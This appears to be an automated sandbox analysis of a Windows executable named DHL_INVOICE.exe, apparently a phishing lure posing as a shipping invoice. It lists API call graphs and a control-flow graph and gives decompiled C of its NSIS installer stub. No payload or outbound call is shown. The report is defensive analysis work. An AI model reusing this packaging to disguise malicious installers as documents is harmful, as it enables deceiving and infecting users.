16 API calls 5489->5491 5492 406b9d 2 API calls 5490->5492 5491->5490 5493 402bcf 5492->5493 5515 40691b GetFileAttributesW CreateFileW 5493->5515 5495 402bdc 5496 402cb7 5495->5496 5499 402c9f 5495->5499 5500 402bfd GlobalAlloc 5495->5500 5497 402cc0 DeleteFileW 5496->5497 5498 402ccf 5496->5498 5497->5498 5501 403148 30 API calls 5499->5501 5500->5499 5502 402c1d 5500->5502 5504 402cac CloseHandle 5501->5504 5516 403131 SetFilePointer 5502->5516 5504->5496 5505 402c23 5506 40311b ReadFile 5505->5506 5507 402c2d GlobalAlloc 5506->5507 5508 402c43 5507->5508 5509 402c84 5507->5509 5510 403148 30 API calls 5508->5510 5511 406a0b WriteFile 5509->5511 5514 402c52 5510->5514 5512 402c93 GlobalFree 5511->5512 5512->5499 5513 402c7a GlobalFree 5513->5509 5514->5513 5515->5495 5516->5505 3927 6f1c167a 3928 6f1c16b7 3927->3928 3969 6f1c2351 3928->3969 3930 6f1c16be 3931 6f1c17ef 3930->3931 3932 6f1c16cf 3930->3932 3933 6f1c16d6 3930->3933 4015 6f1c1fcb 3932->4015 3999 6f1c2049 3933->3999 3938 6f1c1740 3942 6f1c1746 3938->3942 3943 6f1c1791 3938->3943 3939 6f1c1722 4028 6f1c2209 3939->4028 3940 6f1c170a 3953 6f1c1700 3940->3953 4025 6f1c2f9f 3940->4025 3941 6f1c16eb 3945 6f1c16f5 3941->3945 3946 6f1c1702 3941->3946 4047 6f1c1f1e 3942->4047 3950 6f1c2209 10 API calls 3943->3950 3945->3953 4009 6f1c2d14 3945->4009 4019 6f1c17f7 3946->4019 3956 6f1c177e 3950->3956 3951 6f1c1728 4039 6f1c1668 3951->4039 3953->3938 3953->3939 3968 6f1c17de 3956->3968 4052 6f1c200d 3956->4052 3958 6f1c1708 3958->3953 3959 6f1c2209 10 API calls 3959->3956 3962 6f1c17e8 GlobalFree 3962->3931 3965 6f1c17cf 3965->3968 4056 6f1c15c5 wsprintfW 3965->4056 3966 6f1c17c2 FreeLibrary 3966->3965 3968->3931 3968->3962 4059 6f1c12f8 GlobalAlloc 3969->4059 3971 6f1c237f 4060 6f1c12f8 GlobalAlloc 3971->4060 3973 6f1c2a3a GlobalFree GlobalFree GlobalFree 3974 6f1c2a5a 3973->3974 3981 6f1c2aa7 3973->3981 3975 6f1c2af7 3974->3975 3974->3981 3982 6f1c2a73 3974->3982 3977 6f1c2b19 GetModuleHandleW 3975->3977 3975->3981 3976 6f1c238a 3976->3973 3978 6f1c2947 GlobalAlloc 3976->3978 3984 6f1c299f lstrcpyW 3976->3984 3985 6f1c29bd GlobalFree 3976->3985 3989 6f1c29af lstrcpyW 3976->3989 3993 6f1c2822 GlobalFree 3976->3993 3997 6f1c29fb 3976->3997 4061 6f1c12f8 GlobalAlloc 3976->4061 4062 6f1c12e1 3976->4062 3979 6f1c2b3f 3977->3979 3980 6f1c2b2a LoadLibraryW 3977->3980 3978->3976 4067 6f1c1f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 3979->4067 3980->3979 3980->3981 3981->3930 3982->3981 3988 6f1c12e1 2 API calls 3982->3988 3984->3976 3985->3976 3986 6f1c2b9c lstrlenW 4068 6f1c1f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 3986->4068 3987 6f1c2b8e 3987->3981 3987->3986 3988->3981 3989->3976 3991 6f1c2bb6 3991->3981 3993->3976 3994 6f1c2b4c 3994->3987 3995 6f1c2b78 GetProcAddress 3994->3995 3995->3987 3997->3976 4065 6f1c1309 GlobalSize GlobalAlloc 3997->4065 4004 6f1c205e 3999->4004 4001 6f1c2124 GlobalAlloc WideCharToMultiByte 4003 6f1c21be GlobalFree 4001->4003 4002 6f1c2154 GlobalAlloc CLSIDFromString 4002->4004 4003->4004 4005 6f1c16dc 4003->4005 4004->4001 4004->4002 4004->4003 4006 6f1c12e1 lstrcpynW GlobalAlloc 4004->4006 4008 6f1c208b 4004->4008 4005->3940 4005->3941 4005->3953 4006->4004 4008->4003 4008->4004 4070 6f1c1548 4008->4070 4075 6f1c19db 4008->4075 4011 6f1c2d26 4009->4011 4010 6f1c2dcb EnumWindows 4014 6f1c2de9 4010->4014 4011->4010 4078 6f1c2cbf 4014->4078 4016 6f1c1fde 4015->4016 4017 6f1c1fe9 GlobalAlloc 4016->4017 4018 6f1c16d5 4016->4018 4017->4016 4018->3933 4023 6f1c1823 4019->4023 4020 6f1c18a8 4022 6f1c18ac GlobalSize 4020->4022 4024 6f1c18b5 4020->4024 4021 6f1c1897 GlobalAlloc 4021->4024 4022->4024 4023->4020 4023->4021 4024->3958 4026 6f1c2faa 4025->4026 4027 6f1c2fea GlobalFree 4026->4027 4081 6f1c12f8 GlobalAlloc 4028->4081 4030 6f1c22a6 StringFromGUID2 4037 6f1c2211 4030->4037 4031 6f1c22b7 lstrcpynW 4031->4037 4032 6f1c2280 MultiByteToWideChar 4032->4037 4033 6f1c22ee GlobalFree 4033->4037 4034 6f1c22ca wsprintfW 4034->4037 4035 6f1c2325 GlobalFree 4035->3951 4036 6f1c15eb 2 API calls 4036->4037 4037->4030 4037->4031 4037->4032 4037->4033 4037->4034 4037->4035 4037->4036 4082 6f1c1638 4037->4082 4086 6f1c12f8 GlobalAlloc 4039->4086 4041 6f1c166d 4042 6f1c1f1e 2 API calls 4041->4042 4043 6f1c1677 4042->4043 4044 6f1c15eb 4043->4044 4045 6f1c15f4 GlobalAlloc lstrcpynW 4044->4045 4046 6f1c1633 GlobalFree 4044->4046 4045->4046 4046->3956 4048 6f1c1f5c lstrcpyW 4047->4048 4049 6f1c1f2b wsprintfW 4047->4049 4051 6f1c1765 4048->4051 4049->4051 4051->3959 4053 6f1c201c 4052->4053 4054 6f1c17a4 4052->4054 4053->4054 4055 6f1c2033 GlobalFree 4053->4055 4054->3965 4054->3966 4055->4053 4057 6f1c15eb 2 API calls 4056->4057 4058 6f1c15e6 4057->4058 4058->3968 4059->3971 4060->3976 4061->3976 4069 6f1c12f8 GlobalAlloc 4062->4069 4064 6f1c12f0 lstrcpynW 4064->3976 4066 6f1c1327 4065->4066 4066->3997 4067->3994 4068->3991 4069->4064 4071 6f1c12f8 GlobalAlloc 4070->4071 4072 6f1c1555 4070->4072 4071->4008 4073 6f1c12e1 2 API calls 4072->4073 4074 6f1c156a 4073->4074 4074->4008 4076 6f1c1a48 4075->4076 4077 6f1c19ea VirtualAlloc 4075->4077 4076->4008 4077->4076 4079 6f1c2ccd GetLastError 4078->4079 4080 6f1c2cd8 4078->4080 4079->4080 4080->3953 4081->4037 4083 6f1c163f 4082->4083 4084 6f1c1663 4082->4084 4083->4084 4085 6f1c1648 lstrcpyW 4083->4085 4084->4037 4085->4084 4086->4041 4087 402728 4098 4030c1 4087->4098 4090 40303e 16 API calls 4091 40273b 4090->4091 4092 402748 RegQueryValueExW 4091->4092 4096 401709 4091->4096 4093 402772 4092->4093 4094 40276b 4092->4094 4095 40271c RegCloseKey 4093->4095 4093->4096 4094->4093 4103 40661f wsprintfW 4094->4103 4095->4096 4099 40303e 16 API calls 4098->4099 4100 4030d9 4099->4100 4101 4062d8 RegOpenKeyExW 4100->4101 4102 402732 4101->4102 4102->4090 4103->4093 5517 402b28 5518 402b2e 5517->5518 5519 402b36 FindClose 5518->5519 5520 402ea1 5518->5520 5519->5520 5521 4025ac 5522 40303e 16 API calls 5521->5522 5523 4025bd 5522->5523 5524 40303e 16 API calls 5523->5524 5525 4025c6 5524->5525 5526 40303e 16 API calls 5525->5526 5527 4025cf GetPrivateProfileStringW 5526->5527 5528 4025f4 5527->5528 5529 401ead 5530 403002 16 API calls 5529->5530 5531 401eb4 5530->5531 5532 403002 16 API calls 5531->5532 5533 401ebd GetDlgItem 5532->5533 4104 404b30 4105 404cd9 4104->4105 4106 404b4d GetDlgItem GetDlgItem GetDlgItem 4104->4106 4108 404ce1 GetDlgItem CreateThread CloseHandle 4105->4108 4109 404d25 4105->4109 4150 405503 SendMessageW 4106->4150 4111 404d0d 4108->4111 4184 405864 OleInitialize 4108->4184 4112 404d56 4109->4112 4113 404d2d 4109->4113 4110 404bc6 4118 404bcd GetClientRect GetSystemMetrics SendMessageW SendMessageW 4110->4118 4155 40575b 4111->4155 4116 404da4 4112->4116 4117 404d5e 4112->4117 4113->4111 4115 404d39 ShowWindow ShowWindow 4113->4115 4169 405503 SendMessageW 4115->4169 4116->4111 4125 404db7 SendMessageW 4116->4125 4120 404d67 4117->4120 4121 404d7a ShowWindow 4117->4121 4123 404c31 4118->4123 4124 404c1d SendMessageW SendMessageW 4118->4124 4170 405958 4120->4170 4121->4120 4122 404d91 4121->4122 4173 405d3a 4122->4173 4127 404c43 4123->4127 4128 404c39 SendMessageW 4123->4128 4124->4123 4129 404d1b 4125->4129 4130 404dd5 CreatePopupMenu 4125->4130 4151 40551a 4127->4151 4128->4127 4134 405eba 16 API calls 4130->4134 4132 404d54 4132->4111 4136 404de7 AppendMenuW 4134->4136 4135 404c55 4137 404c90 GetDlgItem SendMessageW 4135->4137 4138 404c5e ShowWindow 4135->4138 4139 404e09 GetWindowRect 4136->4139 4140 404e1d TrackPopupMenu 4136->4140 4137->4129 4141 404cbc SendMessageW SendMessageW 4137->4141 4142 404c74 ShowWindow 4138->4142 4143 404c7f 4138->4143 4139->4140 4140->4129 4144 404e3f 4140->4144 4141->4129 4142->4143 4154 405503 SendMessageW 4143->4154 4145 404e53 SendMessageW 4144->4145 4145->4145 4147 404e6f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4145->4147 4148 404e9b SendMessageW 4147->4148 4148->4148 4149 404ec9 GlobalUnlock SetClipboardData CloseClipboard 4148->4149 4149->4129 4150->4110 4152 405eba 16 API calls 4151->4152 4153 405525 SetDlgItemTextW 4152->4153 4153->4135 4154->4137 4156 405773 GetWindowLongW 4155->4156 4166 405829 4155->4166 4157 405788 4156->4157 4156->4166 4158 4057b0 GetSysColor 4157->4158 4159 4057bc 4157->4159 4157->4166 4158->4159 4160 4057c0 SetTextColor 4159->4160 4161 4057ca SetBkMode 4159->4161 4160->4161 4162 4057f2 4161->4162 4163 4057e3 GetSysColor 4161->4163 4164 405803 4162->4164 4165 4057f6 SetBkColor 4162->4165 4163->4162 4164->4166 4167 405813 DeleteObject 4164->4167 4168 40581c CreateBrushIndirect 4164->4168 4165->4164 4166->4129 4167->4168 4168->4166 4169->4132 4171 405965 SendMessageW 4170->4171 4172 40595f 4170->4172 4171->4132 4172->4171 4174 405d4c 4173->4174 4179 405e02 4173->4179 4175 405d6b lstrlenW 4174->4175 4176 405eba 16 API calls 4174->4176 4177 405d7d lstrlenW 4175->4177 4180 405da0 4175->4180 4176->4175 4178 405d92 lstrcatW 4177->4178 4177->4179 4178->4180 4179->4120 4181 405db7 4180->4181 4182 405daa SetWindowTextW 4180->4182 4181->4179 4183 405dbc SendMessageW SendMessageW SendMessageW 4181->4183 4182->4181 4183->4179 4191 4054e8 4184->4191 4186 4058ae 4187 4054e8 SendMessageW 4186->4187 4188 4058c0 OleUninitialize 4187->4188 4190 405887 4190->4186 4194 401399 4190->4194 4192 405500 4191->4192 4193 4054f1 SendMessageW 4191->4193 4192->4190 4193->4192 4195 401413 4194->4195 4197 4013a3 4194->4197 4195->4190 4197->4195 4198 4013df MulDiv SendMessageW 4197->4198 4199 40154a 4197->4199 4198->4197 4200 4015c3 4199->4200 4309 4015ce 4199->4309 4201 4016c1 4200->4201 4202 4017c2 4200->4202 4203 4015e6 4200->4203 4204 4018cb 4200->4204 4205 4016ef 4200->4205 4206 4016af 4200->4206 4207 40182f 4200->4207 4208 401711 4200->4208 4209 401633 SetForegroundWindow 4200->4209 4210 4017d3 4200->4210 4211 4015d5 4200->4211 4212 401618 4200->4212 4213 4015f9 4200->4213 4214 40189b 4200->4214 4215 4018de 4200->4215 4216 40163f 4200->4216 4260 40160c 4200->4260 4200->4309 4221 4016d1 ShowWindow 4201->4221 4222 4016d9 4201->4222 4225 40303e 16 API calls 4202->4225 4224 4015f0 PostQuitMessage 4203->4224 4203->4309 4229 40303e 16 API calls 4204->4229 4223 40303e 16 API calls 4205->4223 4356 40661f wsprintfW 4206->4356 4219 40303e 16 API calls 4207->4219 4226 40303e 16 API calls 4208->4226 4209->4309 4228 40303e 16 API calls 4210->4228 4233 405d3a 23 API calls 4211->4233 4211->4309 4353 403002 4212->4353 4248 401399 72 API calls 4213->4248 4227 40303e 16 API calls 4214->4227 4218 40303e 16 API calls 4215->4218 4243 403002 16 API calls 4216->4243 4216->4309 4242 4018e5 4218->4242 4231 401835 GetFullPathNameW 4219->4231 4221->4222 4232 4016e6 ShowWindow 4222->4232 4222->4309 4234 4016f6 SetFileAttributesW 4223->4234 4224->4309 4235 4017c8 4225->4235 4236 401718 4226->4236 4237 4018a2 SearchPathW 4227->4237 4238 4017da 4228->4238 4239 4018d2 4229->4239 4230 40161e Sleep 4230->4309 4244 401857 4231->4244 4245 40184d 4231->4245 4232->4309 4233->4309 4234->4309 4360 4065cf FindFirstFileW 4235->4360 4310 406bc5 CharNextW CharNextW 4236->4310 4237->4309 4249 40303e 16 API calls 4238->4249 4325 406a56 4239->4325 4240 405d3a 23 API calls 4240->4309 4252 401906 4242->4252 4253 40190e 4242->4253 4243->4309 4244->4245 4261 4065cf 2 API calls 4244->4261 4254 401889 GetShortPathNameW 4245->4254 4245->4309 4248->4309 4250 4017e3 4249->4250 4251 40303e 16 API calls 4250->4251 4256 4017ec MoveFileW 4251->4256 4368 406b1a lstrcpynW 4252->4368 4369 406b1a lstrcpynW 4253->4369 4254->4309 4255 401780 4259 401790 4255->4259 4255->4260 4263 401804 4256->4263 4264 4017f8 4256->4264 4267 405d3a 23 API calls 4259->4267 4260->4240 4268 40186a 4261->4268 4262 4065f6 CharNextW 4279 401720 4262->4279 4271 4065cf 2 API calls 4263->4271 4263->4309 4264->4260 4265 40190c 4274 406d3d 5 API calls 4265->4274 4266 401919 4370 406556 lstrlenW CharPrevW 4266->4370 4270 401797 4267->4270 4268->4245 4367 406b1a lstrcpynW 4268->4367 4324 406b1a lstrcpynW 4270->4324 4278 401814 4271->4278 4298 40192b 4274->4298 4278->4309 4363 40623d MoveFileExW 4278->4363 4279->4255 4279->4262 4282 401769 GetFileAttributesW 4279->4282 4316 4064fc 4279->4316 4319 405e3e CreateDirectoryW 4279->4319 4357 405e1e CreateDirectoryW 4279->4357 4280 4017a2 SetCurrentDirectoryW 4280->4309 4282->4279 4284 4065cf 2 API calls 4284->4298 4287 40193f CompareFileTime 4287->4298 4288 401a18 4289 405d3a 23 API calls 4288->4289 4292 401a24 4289->4292 4290 4019fd 4291 405d3a 23 API calls 4290->4291 4291->4309 4333 403148 4292->4333 4295 401a52 SetFileTime 4297 401a60 CloseHandle 4295->4297 4296 405eba 16 API calls 4296->4298 4299 401a73 4297->4299 4297->4309 4298->4211 4298->4284 4298->4287 4298->4288 4298->4290 4298->4296 4300 406b1a lstrcpynW 4298->4300 4329 406b9d GetFileAttributesW 4298->4329 4332 40691b GetFileAttributesW CreateFileW 4298->4332 4373 406aa8 4298->4373 4301 401a78 4299->4301 4302 401a89 4299->4302 4300->4298 4303 405eba 16 API calls 4301->4303 4304 405eba 16 API calls 4302->4304 4306 401a80 lstrcatW 4303->4306 4307 401a91 4304->4307 4306->4307 4308 406aa8 MessageBoxIndirectW 4307->4308 4308->4309 4309->4197 4311 406be3 4310->4311 4315 406c1a 4310->4315 4312 406bf2 CharNextW 4311->4312 4313 406bf7 4311->4313 4312->4315 4314 4065f6 CharNextW 4313->4314 4313->4315 4314->4313 4315->4279 4377 4068e6 GetModuleHandleA 4316->4377 4320 405e89 GetLastError 4319->4320 4321 405eac 4319->4321 4320->4321 4322 405e96 SetFileSecurityW 4320->4322 4321->4279 4322->4321 4323 405eb0 GetLastError 4322->4323 4323->4321 4324->4280 4326 406a63 GetTickCount GetTempFileNameW 4325->4326 4327 406a9b 4326->4327 4328 406a97 4326->4328 4327->4309 4328->4326 4328->4327 4330 406bbf 4329->4330 4331 406baf SetFileAttributesW 4329->4331 4330->4298 4331->4330 4332->4298 4334 403190 4333->4334 4335 403183 4333->4335 4386 406948 ReadFile 4334->4386 4393 403131 SetFilePointer 4335->4393 4339 4031b6 GetTickCount 4347 403208 4339->4347 4350 401a3a 4339->4350 4340 40331b 4341 403362 4340->4341 4345 40331f 4340->4345 4343 40311b ReadFile 4341->4343 4343->4350 4344 40311b ReadFile 4344->4345 4345->4344 4346 406a0b WriteFile 4345->4346 4345->4350 4346->4345 4348 40325f GetTickCount 4347->4348 4349 403290 MulDiv wsprintfW 4347->4349 4347->4350 4388 40311b 4347->4388 4391 406a0b WriteFile 4347->4391 4348->4347 4351 405d3a 23 API calls 4349->4351 4350->4295 4350->4297 4351->4347 4354 405eba 16 API calls 4353->4354 4355 403016 4354->4355 4355->4230 4356->4309 4358 405e30 GetLastError 4357->4358 4359 405e38 4357->4359 4358->4359 4359->4279 4361 4065f0 4360->4361 4362 4065e5 FindClose 4360->4362 4361->4309 4362->4361 4364 40625e 4363->4364 4365 406251 4363->4365 4364->4264 4394 406306 4365->4394 4367->4245 4368->4265 4369->4266 4371 406573 lstrcatW 4370->4371 4372 40191f lstrcatW 4370->4372 4371->4372 4372->4265 4374 406abd 4373->4374 4375 406b0b 4374->4375 4376 406ad3 MessageBoxIndirectW 4374->4376 4375->4298 4376->4375 4378 406908 GetProcAddress 4377->4378 4379 4068fe 4377->4379 4381 406503 4378->4381 4383 40619e GetSystemDirectoryW 4379->4383 4381->4279 4382 406904 4382->4378 4382->4381 4384 4061c0 wsprintfW LoadLibraryExW 4383->4384 4384->4382 4387 4031a2 4386->4387 4387->4339 4387->4340 4387->4350 4389 406948 ReadFile 4388->4389 4390 40312e 4389->4390 4390->4347 4392 406a2c 4391->4392 4392->4347 4393->4334 4395 406336 4394->4395 4396 40635c GetShortPathNameW 4394->4396 4421 40691b GetFileAttributesW CreateFileW 4395->4421 4398 406371 4396->4398 4399 40643c 4396->4399 4398->4399 4401 406379 wsprintfA 4398->4401 4399->4364 4400 406340 CloseHandle GetShortPathNameW 4400->4399 4402 406354 4400->4402 4403 405eba 16 API calls 4401->4403 4402->4396 4402->4399 4404 4063a2 4403->4404 4422 40691b GetFileAttributesW CreateFileW 4404->4422 4406 4063af 4406->4399 4407 4063ba GetFileSize GlobalAlloc 4406->4407 4408 406435 CloseHandle 4407->4408 4409 4063d9 4407->4409 4408->4399 4410 406948 ReadFile 4409->4410 4411 4063e1 4410->4411 4411->4408 4423 406b36 lstrlenA lstrlenA 4411->4423 4414 406441 4416 406b36 3 API calls 4414->4416 4415 4063f4 lstrcpyA 4417 406406 4415->4417 4416->4417 4418 406417 SetFilePointer 4417->4418 4419 406a0b WriteFile 4418->4419 4420 40642e GlobalFree 4419->4420 4420->4408 4421->4400 4422->4406 4424 4063f0 4423->4424 4425 406b55 4423->4425 4424->4414 4424->4415 4425->4424 4426 406b82 lstrlenA 4425->4426 4426->4424 4426->4425 4427 4027b0 4428 4030c1 16 API calls 4427->4428 4429 4027ba 4428->4429 4430 403002 16 API calls 4429->4430 4431 4027c3 4430->4431 4432 4027d5 4431->4432 4435 401709 4431->4435 4433 4027f0 RegEnumValueW 4432->4433 4434 4027e4 RegEnumKeyW 4432->4434 4436 40280e RegCloseKey 4433->4436 4434->4436 4436->4435 5534 404f33 5535 404f57 5534->5535 5536 404f3f 5534->5536 5538 404f8b 5535->5538 5539 404f5d SHGetPathFromIDListW 5535->5539 5544 406a3a GetDlgItemTextW 5536->5544 5540 404f4c SendMessageW 5539->5540 5541 404f6d 5539->5541 5540->5538 5543 401533 89 API calls 5541->5543 5543->5540 5544->5540 5545 401ab6 5546 40303e 16 API calls 5545->5546 5547 401abd 5546->5547 5548 406aa8 MessageBoxIndirectW 5547->5548 5549 401709 5548->5549 5550 6f1c2c6a 5551 6f1c2cd8 5550->5551 5552 6f1c2cc3 5550->5552 5552->5551 5553 6f1c2ccd GetLastError 5552->5553 5553->5551 5554 402837 5555 40303e 16 API calls 5554->5555 5558 401afd 5555->5558 5557 402855 5558->5554 5558->5557 5559 40691b GetFileAttributesW CreateFileW 5558->5559 5559->5558 5560 401fb8 GetDC 5561 403002 16 API calls 5560->5561 5562 401fc8 GetDeviceCaps MulDiv ReleaseDC 5561->5562 5563 403002 16 API calls 5562->5563 5564 401ff8 5563->5564 5565 405eba 16 API calls 5564->5565 5566 402032 CreateFontIndirectW 5565->5566 5567 401dba 5568 403002 16 API calls 5567->5568 5569 401dc1 5568->5569 5570 403002 16 API calls 5569->5570 5571 401dce 5570->5571 5572 401de1 5571->5572 5573 40303e 16 API calls 5571->5573 5574 401df6 5572->5574 5577 40303e 16 API calls 5572->5577 5573->5572 5575 401e50 5574->5575 5576 401e01 5574->5576 5579 40303e 16 API calls 5575->5579 5578 403002 16 API calls 5576->5578 5577->5574 5580 401e06 5578->5580 5581 401e55 5579->5581 5582 403002 16 API calls 5580->5582 5583 40303e 16 API calls 5581->5583 5584 401e11 5582->5584 5585 401e5e FindWindowExW 5583->5585 5586 401e41 SendMessageW 5584->5586 5587 401e1e SendMessageTimeoutW 5584->5587 5588 401e7b 5585->5588 5586->5588 5587->5588 5589 401bbb 5590 40303e 16 API calls 5589->5590 5591 401bc4 ExpandEnvironmentStringsW 5590->5591 5592 401bd7 5591->5592 5594 401be9 5591->5594 5593 401bdd lstrcmpW 5592->5593 5592->5594 5593->5594

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 4036fc-403745 SetErrorMode GetVersionExW 1 403747-403767 GetVersionExW 0->1 2 40377e 0->2 3 403769-40376d 1->3 4 40377a-40377c 1->4 5 403785-40378a 2->5 6 403770-403778 3->6 4->6 7 403797 5->7 8 40378c-403795 5->8 6->5 9 40379b-4037dd 7->9 8->9 10 4037f0 9->10 11 4037df-4037e7 call 4068e6 9->11 13 4037f5-403807 call 40619e lstrlenA 10->13 11->10 17 4037e9 11->17 18 403809-403825 call 4068e6 * 3 13->18 17->10 25 403836-4038cf #17 OleInitialize SHGetFileInfoW call 406b1a GetCommandLineW call 406b1a call 4065f6 CharNextW 18->25 26 403827-40382d 18->26 35 4038d5 25->35 36 4039aa-4039c4 GetTempPathW call 403ca5 25->36 26->25 31 40382f 26->31 31->25 37 4038d7-4038dd 35->37 42 4039c6-4039e4 GetWindowsDirectoryW lstrcatW call 403ca5 36->42 43 403a1c-403a35 DeleteFileW call 4033ed 36->43 39 4038ea-4038f5 37->39 40 4038df-4038e8 37->40 44 403900-40390f 39->44 45 4038f7-4038fe 39->45 40->39 40->40 42->43 55 4039e6-403a16 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403ca5 42->55 57 403be6 43->57 58 403a3b-403a41 43->58 48 403911-40391d 44->48 49 40396a-40397e call 4065f6 44->49 45->44 53 403937-40393d 48->53 54 40391f-403926 48->54 67 403980-403983 49->67 68 403986-40398c 49->68 61 403959-403960 53->61 62 40393f-403946 53->62 59 403928-40392b 54->59 60 40392d 54->60 55->43 80 403be4 55->80 63 403bea-403bf7 call 4036d2 OleUninitialize 57->63 69 403a43-403a55 call 4065f6 58->69 70 403aa6-403aad call 405a3e 58->70 59->53 59->60 60->53 61->49 66 403962-403968 61->66 62->61 64 403948-40394f 62->64 84 403bf9-403c04 call 406aa8 63->84 85 403c0c-403c13 63->85 72 403951-403954 64->72 73 403956 64->73 66->49 75 403996-4039a5 call 406b1a 66->75 67->68 68->36 76 40398e-403991 68->76 86 403a6b-403a6d 69->86 83 403ab2-403ab4 70->83 72->61 72->73 73->61 75->36 76->37 80->57 83->63 94 403c06 ExitProcess 84->94 90 403c91-403ca0 85->90 91 403c15-403c2b GetCurrentProcess OpenProcessToken 85->91 87 403a57-403a5d 86->87 88 403a6f-403a76 86->88 98 403a68 87->98 99 403a5f-403a66 87->99 92 403a78-403a88 call 406638 88->92 93 403ab9-403ad1 call 4064fc lstrcatW 88->93 90->94 96 403c61-403c6f call 4068e6 91->96 97 403c2d-403c5b LookupPrivilegeValueW AdjustTokenPrivileges 91->97 108 403be0-403be2 92->108 109 403a8e-403aa4 call 406b1a * 2 92->109 106 403ae2-403b03 lstrcatW lstrcmpiW 93->106 107 403ad3-403add lstrcatW 93->107 110 403c71-403c7b 96->110 111 403c7d-403c88 ExitWindowsEx 96->111 97->96 98->86 99->88 99->98 106->108 113 403b09-403b10 106->113 107->106 108->63 109->70 110->111 112 403c8a-403c8c call 401533 110->112 111->90 111->112 112->90 116 403b12-403b17 call 405e3e 113->116 117 403b19 call 405e1e 113->117 124 403b1e-403b30 SetCurrentDirectoryW 116->124 117->124 126 403b41-403b5b call 406b1a 124->126 127 403b32-403b3c call 406b1a 124->127 131 403b5c-403b7a call 405eba DeleteFileW 126->131 127->126 134 403bc9-403bd3 131->134 135 403b7c-403b90 CopyFileW 131->135 134->131 137 403bd5-403bdb call 40623d 134->137 135->134 136 403b92-403bbe call 40623d call 405eba call 4066d6 135->136 136->134 145 403bc0-403bc7 CloseHandle 136->145 137->108 145->134
                                                                            C-Code - Quality: 83%
                                                                            			_entry_() {
                                                                            				char _v694;
                                                                            				struct _SHFILEINFOW _v696;
                                                                            				signed char _v700;
                                                                            				intOrPtr _v930;
                                                                            				struct _OSVERSIONINFOW _v976;
                                                                            				long _v1004;
                                                                            				struct _TOKEN_PRIVILEGES _v1016;
                                                                            				intOrPtr _v1020;
                                                                            				void* _v1024;
                                                                            				int _v1028;
                                                                            				intOrPtr _v1036;
                                                                            				signed short* _v1048;
                                                                            				signed int _t45;
                                                                            				intOrPtr* _t58;
                                                                            				signed int _t71;
                                                                            				void* _t79;
                                                                            				void* _t80;
                                                                            				void* _t81;
                                                                            				void* _t83;
                                                                            				WCHAR* _t91;
                                                                            				void* _t95;
                                                                            				void* _t103;
                                                                            				void* _t107;
                                                                            				void* _t113;
                                                                            				signed short _t124;
                                                                            				intOrPtr* _t126;
                                                                            				signed short _t128;
                                                                            				void* _t131;
                                                                            				intOrPtr* _t132;
                                                                            				void* _t136;
                                                                            				signed char _t137;
                                                                            				void* _t140;
                                                                            				WCHAR* _t141;
                                                                            				int _t143;
                                                                            				void* _t144;
                                                                            				signed int _t149;
                                                                            				void* _t153;
                                                                            				signed int _t154;
                                                                            				signed int _t155;
                                                                            				signed char _t156;
                                                                            				signed int _t158;
                                                                            				signed short _t159;
                                                                            				void* _t160;
                                                                            				int _t161;
                                                                            				CHAR* _t163;
                                                                            				intOrPtr _t165;
                                                                            				void* _t168;
                                                                            				void* _t169;
                                                                            				void* _t170;
                                                                            				signed int _t173;
                                                                            				signed int _t175;
                                                                            				int _t176;
                                                                            
                                                                            				_t161 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                            				_v1004 = 0;
                                                                            				_t175 = 0; // executed
                                                                            				SetErrorMode(0x8001); // executed
                                                                            				asm("xorps xmm0, xmm0");
                                                                            				_v976.szCSDVersion = 0;
                                                                            				asm("movlpd [esp+0x144], xmm0");
                                                                            				_v976.dwOSVersionInfoSize = 0x11c;
                                                                            				if(GetVersionExW( &_v976) != 0) {
                                                                            					_t156 = _v694;
                                                                            				} else {
                                                                            					_v976.dwOSVersionInfoSize = 0x114;
                                                                            					GetVersionExW( &_v976);
                                                                            					_t136 = 0x53;
                                                                            					_t156 = 4;
                                                                            					_v694 = 4;
                                                                            					if(_v976.szCSDVersion != _t136) {
                                                                            						_t137 = 0;
                                                                            					} else {
                                                                            						_t137 = _v930 + 0xffffffd0;
                                                                            					}
                                                                            					_v700 = _t137;
                                                                            				}
                                                                            				if(_v976.dwMajorVersion >= 0xa) {
                                                                            					_t45 = _v976.dwBuildNumber;
                                                                            				} else {
                                                                            					_t45 = _v976.dwBuildNumber & 0x0000ffff;
                                                                            					_v976.dwBuildNumber = _t45;
                                                                            				}
                                                                            				 *0x435af8 = _t45;
                                                                            				_t149 = ((_v976.dwMajorVersion & 0x000000ff) << 0x00000008 & 0x0000ffff | _v976.dwMinorVersion & 0x000000ff) << 0x00000010 | (_v700 & 0x000000ff) << 0x00000008 & 0x0000ffff | _t156 & 0x000000ff;
                                                                            				 *0x435afc = _t149;
                                                                            				if(_t149 >> 0x10 != 0x600) {
                                                                            					_t132 = E004068E6(0);
                                                                            					if(_t132 != 0) {
                                                                            						 *_t132(0xc00);
                                                                            					}
                                                                            				}
                                                                            				_t163 = "UXTHEME";
                                                                            				do {
                                                                            					E0040619E(_t163); // executed
                                                                            					_t163 =  &(( &(_t163[1]))[lstrlenA(_t163)]);
                                                                            				} while ( *_t163 != 0);
                                                                            				E004068E6(0xb);
                                                                            				 *0x4349f0 = E004068E6(9);
                                                                            				_t58 = E004068E6(7);
                                                                            				if(_t58 != 0) {
                                                                            					_t58 =  *_t58(0x1e);
                                                                            					if(_t58 != 0) {
                                                                            						 *0x435afc =  *0x435afc | 0x00000080;
                                                                            					}
                                                                            				}
                                                                            				__imp__#17();
                                                                            				__imp__OleInitialize(0); // executed
                                                                            				 *0x435a60 = _t58;
                                                                            				SHGetFileInfoW(0x4095b0, 0,  &_v696, 0x2b4, 0); // executed
                                                                            				E00406B1A(0x434a00, L"NSIS Error");
                                                                            				E00406B1A(L"\"C:\\Users\\Arthur\\Desktop\\DHL_INVOICE.exe\"", GetCommandLineW());
                                                                            				_t165 = 0x22;
                                                                            				_t140 = 0x20;
                                                                            				 *0x4349f4 = 0x400000;
                                                                            				_v1036 = _t165;
                                                                            				_t65 =  !=  ? _t140 : _t165;
                                                                            				_t66 = ( !=  ? _t140 : _t165) & 0x0000ffff;
                                                                            				_t68 =  ==  ?  &M00440002 : L"\"C:\\Users\\Arthur\\Desktop\\DHL_INVOICE.exe\"";
